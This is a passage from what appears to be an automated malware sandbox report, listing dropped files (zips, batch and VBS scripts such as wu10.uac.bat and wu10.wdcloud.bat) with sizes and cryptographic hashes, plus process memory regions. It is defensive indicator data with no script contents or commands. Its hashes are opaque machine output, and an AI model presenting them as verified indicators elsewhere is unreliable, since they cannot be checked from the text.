                      d67e307f11cf9f31dd7cd28c8e6e021364fcc88c10249c2d37b21252565352ffe418c90e890fc414dd38d317337faad5ee038944645cf6d34ce64cb75ab14713

                    • C:\ProgramData\extracted\file_4.zip

                      Filesize

                      579KB

                      MD5

                      382c825c318894294ff08149e5da252c

                      SHA1

                      60e8483b1c8d87f4bbd3c05b16da6daa10a199ff

                      SHA256

                      523233d6a5542c2d0e46dbcf4bd9c5aa68d9bdf64ba92ddf39a7ad8a7a7f825f

                      SHA512

                      6d9b982a833660082f9568430a817c4246bac63d0f15e96996cfef92ef1894c590afa146cde8fc30fb6dd0ba40bd52971fe46a1caa5ff03dbd1863fb4a5fce9c

                    • C:\ProgramData\extracted\file_5.zip

                      Filesize

                      579KB

                      MD5

                      cf769707931e40692892baec51f61f7e

                      SHA1

                      92a00bca5d5dc2fa8127fe3bf245ac25f4a7d168

                      SHA256

                      5f84ea95825879689b2be7d4ee06be8e5efa077c7a4541c6bf4c5efee47823a1

                      SHA512

                      31acae932f2ecee9f8ff087fadd6b4ae08b1476b070af6609f1961722c70ff4ea6642a1ed908ec1d391addfa6c22fc45569639ffde919693e6c01f4ac8ffd8c8

                    • C:\ProgramData\extracted\file_6.zip

                      Filesize

                      579KB

                      MD5

                      3903605d1086b2a11f0745e595b8337e

                      SHA1

                      efbf5c65c249ebdadc452c98186dce4a6f7f94cb

                      SHA256

                      59304259a5df8481416c12a8e92dffb877f690b64a311abffe785b56ecd1f15d

                      SHA512

                      5ac062ed90a80b80c6e965d0083d6954a4a1f7b9b3948e8b2958004652c4e431244aa385fdf30e6ae369f2a961f2a4abfb295cd4d36874e3521679f4c1e3d4bc

                    • C:\ProgramData\extracted\file_7.zip

                      Filesize

                      579KB

                      MD5

                      539d9f879e17151705dacb13f797f1aa

                      SHA1

                      b9dd5b23ffd1d1594d5bc69cde270aedf3de8b67

                      SHA256

                      a975e8a5ddaa3e35c99a6379d1a0c1f3ca85c3386c322b63a0be7ad1f878f7d4

                      SHA512

                      3b10b3c0a3206ac013073de1be4d892d56fa143a195690dff96b4bcca8455ee4e5f35e8c6dc5ead4ffd688de3e78034e9874b0446e8d3d89977afcfef43006d3

                    • C:\ProgramData\extracted\file_8.zip

                      Filesize

                      579KB

                      MD5

                      cbd21ca9e5086813bdeaaf5e0f7a2358

                      SHA1

                      f497db4a1ff16ee8f81016815da8dabfabba2ff9

                      SHA256

                      fa023433d0cf6fd8c39a0d3d3a6fd82c56fc120d3b603fa2ddaec50b42583007

                      SHA512

                      dc4cfbaec3d65b5aaebeac1aaff40ec9725b5596d4869216ed03aff0cddc1781959d5a1f47e37bb1bc8e2cf9b64e3d8256430d784d1b38ccf7867e9418ea4223

                    • C:\ProgramData\extracted\file_9.zip

                      Filesize

                      2.0MB

                      MD5

                      ae2c632a667e68976fb88a7682586951

                      SHA1

                      eebd5f7fd72d2af3c802757bb9af592e88669c78

                      SHA256

                      4cea89b96f5e8650c440d737be8cd574211538df26d28eee97c9ba94393ee9e2

                      SHA512

                      d9da6900ef5172abe39c927c64aa56cc53d836af600552d7e3f656af46a125ef29c2654766e0ff858ebfb929a4cf2ceab308dd7cc307a6cca02a60822dcc1ebd

                    • C:\ProgramData\file.bin

                      Filesize

                      2.3MB

                      MD5

                      70fc649e1636c2705138783ee5495ad9

                      SHA1

                      fd66954bd03d7549dbc337f7d4939a3c1d57d0f2

                      SHA256

                      711a49c3f419fb284eeca6b7ad9e52f5471562a760f269e32d1f930eb50750fe

                      SHA512

                      19c257d12acebc4be39daa483df237e917fb09b26e62e4051437029df28a3ffe738b52573d6f3ba13b770884be2f18b66fc1b85109209fe2e91fbceeb37753af

                    • C:\ProgramData\file.bin

                      Filesize

                      2.0MB

                      MD5

                      c439fa38d73b7548100c3ef8b30ae5f8

                      SHA1

                      ab3f05798c93049c0a0dabb0996cb5ce2d4f21a0

                      SHA256

                      a9130c4d7571821a0bbd7731e329bbb3b3fc0da57c1170f392db84d8ffa76b7c

                      SHA512

                      4371aee58d3a8a1c58b463e02c9ae07d3483b30766af35eba103a3ff47cd9f3be80d5c52efc91fe9d53c4209dc9772f1f87c72bedc6c3043dc841f68d4dc94f1

                    • C:\ProgramData\main.bat

                      Filesize

                      383B

                      MD5

                      564689fbb804cae85e189fa356bdffab

                      SHA1

                      032abc812bd5979f8e4d89c9a9ebc318cab4faee

                      SHA256

                      a74020b5c6eeb0444ba3de36d1cb37b578107d3fa78acfa5110eb5b1d06aaa2c

                      SHA512

                      4b4aef287663c466acd360047c107c807e50efa5e8eee12bf196209df5d5e5412dbdd4b1ae0c0bec9f6b4dfc41a6429a864d94280e3f2087e9a6fb3f4e2cc62a

                    • C:\ProgramData\main.bat

                      Filesize

                      389B

                      MD5

                      d9cf681686547265496d12488ea5ff37

                      SHA1

                      e62e3980995d3799228ee1806f0c1b21c985fb56

                      SHA256

                      25473e23f350ec5ba71151914e51c4511548917ca0304ee4de57f0ddb139b8a6

                      SHA512

                      8bb88c8a68a0938586424adf72f83bcec235b7d0218449d98730496cc902f4f0a2b1ce2638158be299067605455fb3ead5da9afd68c547fdde6021d31b655b33

                    • C:\ProgramData\wu10.2run.vbs

                      Filesize

                      138B

                      MD5

                      5a14fa9448a36120fa13e30c1c27cea1

                      SHA1

                      d9ee005ff4638392b77541a9ceddbf17df53ab82

                      SHA256

                      9371524b0fdb3d92b5c7c90f040c962ca129395d4688ef898087045223ee6f73

                      SHA512

                      8f861200363a9d9784b0be584bd90d3dc1f9b7f77710c6bd160e8d7c8989e6330b10e9cfecd25dd13158ab1d28d6925ef9135e73c185fe211de1129122aa2a1f

                    • C:\ProgramData\wu10.delete.bat

                      Filesize

                      255B

                      MD5

                      ee0996325569f1a4739509708717f8f3

                      SHA1

                      3514f1e94cb2f745ed8ff84875fd2d90a9e68bc7

                      SHA256

                      7631ab00b4b6868f57e9ed5e80bc5b12457ea912759490cbea95101f7918844a

                      SHA512

                      6b6a66ff69e4945328a868a31ef07cac425a1372c77e9cd090d5637d9686555506ce851d72473263d522bef07a9ba2bd39e59cc50f9218588dd0e00021068f4d

                    • C:\ProgramData\wu10.run.vbs

                      Filesize

                      131B

                      MD5

                      9acf11d00161e3f209c06e4577eb42c6

                      SHA1

                      bed9c68c145ce8bdf7f3d60d374891fd57e72bb1

                      SHA256

                      17432647b9096ed21d2a1ba618e11feef7f055f51abdd19ef23a85142ec1b51b

                      SHA512

                      271fc2d1264ac153c847a0ad75654bdeb2062217629e68e085f338c22a70e558d9f89c358e5428548f9ab0d754bfcd7d6211696f39535f2672a2b98c65b89baa

                    • C:\ProgramData\wu10.uac.bat

                      Filesize

                      366B

                      MD5

                      408e11f699d802ea56fabac297802c5e

                      SHA1

                      c07e71e98a52511dfd1c8ffb2803a41d6b9b3f8f

                      SHA256

                      1e86c340c81834db772c9e1e48f89534eeed9b386bc5b02d5907fc8f71ea4fe4

                      SHA512

                      e165b551abeba9ee85efc7d89b98fa822c203d24d5ce7e175acb7da43eab944a35a01fb3891ff7ad852a1cc33b549fbb96d84b8f10978bd5332b54fc2a22e126

                    • C:\ProgramData\wu10.wdcloud.bat

                      Filesize

                      1KB

                      MD5

                      c830fde2d469ea25922346b9166da248

                      SHA1

                      8dc4fa362b2f79b5294265981256e623553172f9

                      SHA256

                      59ee85c3ee8a0cb34a2b82168456748731d3ae81d15b0806ed861a5be0c012c1

                      SHA512

                      a045bca872978579e7d5039fdce839a6de98e4a8e5031a809653cdc0b11832a89d2076be0fc1d8456baaf62947e43934827b37cef815a8cee1918d80280656bd

                    • C:\Users\Admin\AppData\Local\Temp\is-I5S58.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp

                      Filesize

                      2.5MB

                      MD5

                      7b493e07a8a18509ad2e3fcb4a7e5fa9

                      SHA1

                      9f9b9e80000d1e5311ad66a8ee78df9ecbedde9c

                      SHA256

                      fee6096ebb65358593028523d91e380be7cdd9d1ff0c1da1aeff06b510ebb9da

                      SHA512

                      3dcb03337504bf41376f1ee3c6bf87a02704ab95befa965beae314d1f405bed5617ff25c7ba787507a726e5684ad6b8019e80b9e191b8b5a6b7bf2b9f799533a

                    • memory/684-56-0x0000000000400000-0x00000000004D2000-memory.dmp

                      Filesize

                      840KB

                    • memory/684-2-0x0000000000401000-0x00000000004A9000-memory.dmp

                      Filesize

                      672KB

                    • memory/684-0-0x0000000000400000-0x00000000004D2000-memory.dmp

                      Filesize

                      840KB

                    • memory/2120-166-0x0000000000400000-0x000000000068D000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/2340-225-0x0000000000560000-0x00000000005F3000-memory.dmp

                      Filesize

                      588KB

                    • memory/2340-228-0x0000000000560000-0x00000000005F3000-memory.dmp

                      Filesize

                      588KB

                    • memory/2776-148-0x0000000000DC0000-0x0000000000EBC000-memory.dmp

                      Filesize

                      1008KB

                    • memory/2776-150-0x0000000003300000-0x0000000003320000-memory.dmp

                      Filesize

                      128KB

                    • memory/2776-151-0x00000000058B0000-0x0000000005942000-memory.dmp

                      Filesize

                      584KB

                    • memory/2776-149-0x0000000005A00000-0x0000000005D54000-memory.dmp

                      Filesize

                      3.3MB

                    • memory/3040-33-0x0000000000400000-0x00000000004D2000-memory.dmp

                      Filesize

                      840KB

                    • memory/3040-173-0x0000000000400000-0x00000000004D2000-memory.dmp

                      Filesize

                      840KB

                    • memory/3040-30-0x0000000000400000-0x00000000004D2000-memory.dmp

                      Filesize

                      840KB

                    • memory/3832-52-0x0000000000400000-0x000000000068D000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/3832-6-0x0000000000400000-0x000000000068D000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/4372-221-0x00000000063C0000-0x0000000006964000-memory.dmp

                      Filesize

                      5.6MB

                    • memory/4372-222-0x0000000005360000-0x0000000005366000-memory.dmp

                      Filesize

                      24KB

                    • memory/4372-223-0x0000000006340000-0x0000000006384000-memory.dmp

                      Filesize

                      272KB

                    • memory/4372-224-0x00000000062E0000-0x00000000062EC000-memory.dmp

                      Filesize

                      48KB